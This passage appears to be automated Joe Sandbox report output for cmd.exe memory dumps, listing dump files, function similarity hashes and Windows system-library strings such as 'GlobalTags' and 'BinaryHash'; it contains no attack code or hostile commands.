                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0310063D
                                                                        • kLsE, xrefs: 03100540
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                        • API String ID: 0-2547482624
                                                                        • Opcode ID: ff752fb93b1fc6aa80a23678fb96a0c5f6f5a5fc040fabe5bb1f01c4da747fb2
                                                                        • Instruction ID: 6f40986dbe9523f7bbb2f2fffdac267ab86f57f7aff2a4bf19e780b754241174
                                                                        • Opcode Fuzzy Hash: ff752fb93b1fc6aa80a23678fb96a0c5f6f5a5fc040fabe5bb1f01c4da747fb2
                                                                        • Instruction Fuzzy Hash: 7151AEB55047428FC724EF65C5407ABB7E9AF8D304F08893EE9AA87280E7B4D545CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0310A2FB
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0310A309
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        • Opcode ID: eec0b5c6e8b114b828c9b139b4a324087bafe0649528e69e430cca98e1661bc7
                                                                        • Instruction ID: f20cee04bd4f463e3ab97a411668d06b45c6fb8ec60acdcac8ce8189536faf97
                                                                        • Opcode Fuzzy Hash: eec0b5c6e8b114b828c9b139b4a324087bafe0649528e69e430cca98e1661bc7
                                                                        • Instruction Fuzzy Hash: 7441AC35A04759DBCB25CFA9C840BAAB7B4EF89700F1984A9EC10DF2A1E3B5D941CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Cleanup Group$Threadpool!
                                                                        • API String ID: 2994545307-4008356553
                                                                        • Opcode ID: 6d6b84e643b059f35444cabc81a3e13bfef4eb4d784535c356bd5c984c0c5074
                                                                        • Instruction ID: 19ed6a71008a4cc584028924be2ecb41819f774266f244013a49c196ce22e06a
                                                                        • Opcode Fuzzy Hash: 6d6b84e643b059f35444cabc81a3e13bfef4eb4d784535c356bd5c984c0c5074
                                                                        • Instruction Fuzzy Hash: 0A0128B2280700AFD311DF14CD45F16B7E9EB49725F018939B598CB190E334D844CB46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MUI
                                                                        • API String ID: 0-1339004836
                                                                        • Opcode ID: 9245b6aa996fd7145fe1571ad25a96c90faae9f6724db96593585af4c48b90bb
                                                                        • Instruction ID: 69dc646b4e27e1e190465e5f8049e0d47cf1164d82bb83069884bea5a0591b12
                                                                        • Opcode Fuzzy Hash: 9245b6aa996fd7145fe1571ad25a96c90faae9f6724db96593585af4c48b90bb
                                                                        • Instruction Fuzzy Hash: A6825D75E002189FDB24CFA9D9807EDF7B5BF4C710F188269E859AB294D7B09981CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 67d22ca10b25a8958066c138b24af210ad4eab04434ecfc7b454f044986a8006
                                                                        • Instruction ID: e6f42d822454813cf3c7f2644eb98c2d1adfce1dc7608047e4aeb6c568bbb543
                                                                        • Opcode Fuzzy Hash: 67d22ca10b25a8958066c138b24af210ad4eab04434ecfc7b454f044986a8006
                                                                        • Instruction Fuzzy Hash: AA916D75A01619AFDB21EF95CC85FAEBBB8EF08B50F244065F600AB190D775AD00CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 3f3685f7c52d8ac32526aa5abef5142bc4ea3905e4ec295d2202c71e33570b21
                                                                        • Instruction ID: 2a20f5cc6a5c2a4aa8a62197258ff623b687b616c73452fd3d6a978c99b8aedc
                                                                        • Opcode Fuzzy Hash: 3f3685f7c52d8ac32526aa5abef5142bc4ea3905e4ec295d2202c71e33570b21
                                                                        • Instruction Fuzzy Hash: 2B91B239A01A08BBDB26EBA9DC44FEFBB79EF8D740F140025F501AB250DB349951CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalTags
                                                                        • API String ID: 0-1106856819
                                                                        • Opcode ID: e306157e53d48cd6363f9834f48df509183bb37335466d11fbcafe94994efd3b
                                                                        • Instruction ID: b0bbae30fe797397814c17958df767f1a3ec3d59aabe82d5e58162078716e5f8
                                                                        • Opcode Fuzzy Hash: e306157e53d48cd6363f9834f48df509183bb37335466d11fbcafe94994efd3b
                                                                        • Instruction Fuzzy Hash: F4715B75E0071A9FDF28CF99C9906EDBBB2BF4C750F18816EE845AB244E7319941CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .mui
                                                                        • API String ID: 0-1199573805
                                                                        • Opcode ID: 63249743a8bee1b3b56efc2b8e8d2213dc896eed9bb0c68e9e56490a74edccb7
                                                                        • Instruction ID: 407687474b16781644a6ea5cf772781eb6c9339379b6326bda9938402d5204da
                                                                        • Opcode Fuzzy Hash: 63249743a8bee1b3b56efc2b8e8d2213dc896eed9bb0c68e9e56490a74edccb7
                                                                        • Instruction Fuzzy Hash: 1F51837AD017299BCB14DFAED841AAEF7B4AF0C651F054129E912BB340DBB49901CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EXT-
                                                                        • API String ID: 0-1948896318
                                                                        • Opcode ID: 5a57aaf980b900c8976c239467003e055393573cf8c6738c1c77f9efddfc1936
                                                                        • Instruction ID: fbd3a1e7bd8f6b83dd555f01674c956e57cf62a1dded8a28c7617df1e670225e
                                                                        • Opcode Fuzzy Hash: 5a57aaf980b900c8976c239467003e055393573cf8c6738c1c77f9efddfc1936
                                                                        • Instruction Fuzzy Hash: 264180766093119BE710DBB5C840BABB7E8AF8C714F440A3DF984DB180EB74D954C7A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: 6e6feaa643b7d42d4d1be8cc0c07438378c22b56e53aff25d7c676dd5d4ac9a4
                                                                        • Instruction ID: 14c377d9428f6210ff43886735fe15e5196f0d71e3220291acc182958e2c2e0f
                                                                        • Opcode Fuzzy Hash: 6e6feaa643b7d42d4d1be8cc0c07438378c22b56e53aff25d7c676dd5d4ac9a4
                                                                        • Instruction Fuzzy Hash: 134121B5D0162CABDB21DB60CC84FDEB77CAB49714F0445E5EA18AB140DB709E898FE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #
                                                                        • API String ID: 0-1885708031
                                                                        • Opcode ID: b8005370d39a4812af308040e2b6d2225ddbc6a425139a188f7376fa5696081e
                                                                        • Instruction ID: b75132f01995efc612e410919006864fe963546e434c2aeac5782edd8e97c81d
                                                                        • Opcode Fuzzy Hash: b8005370d39a4812af308040e2b6d2225ddbc6a425139a188f7376fa5696081e
                                                                        • Instruction Fuzzy Hash: 7A311631A007189BEF21DF69C850BEEB7A8DF0D714F14406AF841AB281DB75E945CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        • Opcode ID: c9dee4618b81cf151bb45efd546bfd0bb35fda2d6ced8e8b58b03d593063122f
                                                                        • Instruction ID: 49d8840dd523c93c21378f0a5ffb29d9c0d3e372dbdf60ea17b615e501f23b4d
                                                                        • Opcode Fuzzy Hash: c9dee4618b81cf151bb45efd546bfd0bb35fda2d6ced8e8b58b03d593063122f
                                                                        • Instruction Fuzzy Hash: 8E312536D40615AFDB15DB59C849EAFF778EF887A0F194169F801AB250D7309E00CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0318895E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                        • API String ID: 0-702105204
                                                                        • Opcode ID: b92f56fda1bb0700c72540f21714f25a2ba1ffeeb740c91e04d99c182e51c551
                                                                        • Instruction ID: f78dccfb12d15be214b557a3ba85dcc92065e45732d1bede42770b7d11bca62a
                                                                        • Opcode Fuzzy Hash: b92f56fda1bb0700c72540f21714f25a2ba1ffeeb740c91e04d99c182e51c551
                                                                        • Instruction Fuzzy Hash: A601D035714301DFD724FB55DC84B5ABF66EFCD650B480518E5411A553CF60AC82CEAA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e894ec7b948f5944d147993e7c16f4d5c0ac9a08a9846172138f5f2ec8e71eaa
                                                                        • Instruction ID: 96e1f5d3e58074bd819333c00687b875fe5d03c130a909fe2ae60bb1256da661
                                                                        • Opcode Fuzzy Hash: e894ec7b948f5944d147993e7c16f4d5c0ac9a08a9846172138f5f2ec8e71eaa
                                                                        • Instruction Fuzzy Hash: 4442BE3A608B419BD725CF6CC890A6BF7E9AF8C701F080D2DF9869B250D771D946CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 582e37b2bb5a94d74c8d4a11e54966e0760a43be54039e870d603ec0cca33274
                                                                        • Instruction ID: acf957623322ec20aa15c87d27b482157d91d0d91e61eeeaeff37f5f2903e4b5
                                                                        • Opcode Fuzzy Hash: 582e37b2bb5a94d74c8d4a11e54966e0760a43be54039e870d603ec0cca33274
                                                                        • Instruction Fuzzy Hash: 6F424B75A102198FEF24CF69C881BADF7F5BF49300F19819AE949EB241D7349985CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef2e02be3014e09a91258ff4c9089ee99a5e8679c16c1597474da8c205eeb79c
                                                                        • Instruction ID: 6992566c57312aa597f4c0073240fd205eb4e285789c05f0bf49f4b6663e3d07
                                                                        • Opcode Fuzzy Hash: ef2e02be3014e09a91258ff4c9089ee99a5e8679c16c1597474da8c205eeb79c
                                                                        • Instruction Fuzzy Hash: DE22C178604A518FDB29CF2DC094372B7F1AF4D302F0D849AE9968F286D735E492CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f6e40643dc387f955b1219a04e5ff57655a79d07ea7df05d4ed2322a80ce9e3
                                                                        • Instruction ID: c03001b4f550249aa40b64331d38a2bc2c889b5e8f60248ef54bf9fb9027e11b
                                                                        • Opcode Fuzzy Hash: 6f6e40643dc387f955b1219a04e5ff57655a79d07ea7df05d4ed2322a80ce9e3
                                                                        • Instruction Fuzzy Hash: 68329D75A00205DFDB24CFA8C480BAAB7F5FF4C310F288569E956AB391DB74E861CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction ID: 548876980bff2da8ce015c3289a0861a2547f02e28afc3d3797037bc21ad8520
                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction Fuzzy Hash: 15F15575E002299BDB18CF9AD990BAEFBB5BF4C710F098169E805EB344DB74D861CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40c1b1162d8a08eb0621a5968ea3565de6845aa09d9473bffd4175b3e838bc78
                                                                        • Instruction ID: 9694af97b81c55245b5a4e6baac75b126931139cba66017fce538d3a8809ee20
                                                                        • Opcode Fuzzy Hash: 40c1b1162d8a08eb0621a5968ea3565de6845aa09d9473bffd4175b3e838bc78
                                                                        • Instruction Fuzzy Hash: 03D1E272A006099BEF19CF69C841AFEB7F5AF8D304F19816AD856E7240E735E905CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 32bdfe4c168dcfbc09bf09020ed5d03a953fc27a26c883f38b4188bc408fb163
                                                                        • Instruction ID: 246dfa23959717eaf215f599755c58d337e45c3f45038abbc5fc80ce58c866e2
                                                                        • Opcode Fuzzy Hash: 32bdfe4c168dcfbc09bf09020ed5d03a953fc27a26c883f38b4188bc408fb163
                                                                        • Instruction Fuzzy Hash: 0EE1AC71608341CFC714CF28C080A6AFBE5FF89314F098A6DE8998B391DB71E955CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 10046cb742737bd77e31609cbf52c2e6329c7fc2870b15991b525af329ea344c
                                                                        • Instruction ID: 6a07c04854f4d9e35b39e0bb6d078deb12756e8cc495e21976e4a6a11d92146f
                                                                        • Opcode Fuzzy Hash: 10046cb742737bd77e31609cbf52c2e6329c7fc2870b15991b525af329ea344c
                                                                        • Instruction Fuzzy Hash: 1ED1AF75A0571ADFCB14DF65C890AFFB7A5BF48204F08C629FA269B680E730E945CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction ID: 2d73aa95715ac6e215b18d9263a1c7005e2426fb97eaded41263e0df6ab6776f
                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction Fuzzy Hash: ADB14275A00708AFDB24EF95C940EABB7BAFF8C304F944469A9429B790DB34E945CF14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                        • Instruction ID: a0a289322cfc3642f5e4640be49c54d2111ba1730ea6c381432faa482fe49f42
                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                        • Instruction Fuzzy Hash: 71B12775A00645AFDB15CBA8C850BFEF7FAAF4D300F1901A9D552DB285DB30E991CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
